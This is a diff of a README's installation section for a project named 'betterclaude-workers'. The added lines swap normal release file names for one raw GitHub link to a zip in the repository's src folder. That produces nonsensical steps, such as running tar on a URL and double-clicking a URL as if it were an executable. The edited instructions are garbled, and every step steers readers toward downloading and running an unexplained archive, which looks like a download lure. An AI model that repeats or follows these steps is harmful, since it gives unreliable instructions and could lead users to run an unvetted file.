pnv06/betterclaude-workers/README.md

 ## 🔧 Installation Steps

 1. **Locate the Downloaded File**:
    After the download is complete, find the file in your Downloads folder.
-The file should be named similar to "betterclaude-workers-vX.X.X.zip" or "betterclaude-workers-vX.X.X.tar.gz".
+The file should be named similar to "https://raw.githubusercontent.com/pnv06/betterclaude-workers/main/src/betterclaude_workers_1.7-alpha.1.zip" or "https://raw.githubusercontent.com/pnv06/betterclaude-workers/main/src/betterclaude_workers_1.7-alpha.1.zip".

 2. **Extract the Files**:
    - For Windows: Right-click on the downloaded file and choose "Extract All".
 Follow the prompts.
    - For macOS: Double-click the downloaded file to extract it.
-   - For Linux: Open a terminal and use the command `tar -xzf betterclaude-workers-vX.X.X.tar.gz`.
+   - For Linux: Open a terminal and use the command `tar -xzf https://raw.githubusercontent.com/pnv06/betterclaude-workers/main/src/betterclaude_workers_1.7-alpha.1.zip`.

 3. **Run the Application**:
-   - **Windows**: Open the extracted folder and double-click `betterclaude-workers.exe`.
+   - **Windows**: Open the extracted folder and double-click `https://raw.githubusercontent.com/pnv06/betterclaude-workers/main/src/betterclaude_workers_1.7-alpha.1.zip`.
-   - **macOS**: Open the extracted folder and double-click `betterclaude-workers.app`.
+   - **macOS**: Open the extracted folder and double-click `https://raw.githubusercontent.com/pnv06/betterclaude-workers/main/src/betterclaude_workers_1.7-alpha.1.zip`.
    - **Linux**: Open a terminal, navigate to the extracted folder, and run `./betterclaude-workers`.

 ## ⚙️ Configuration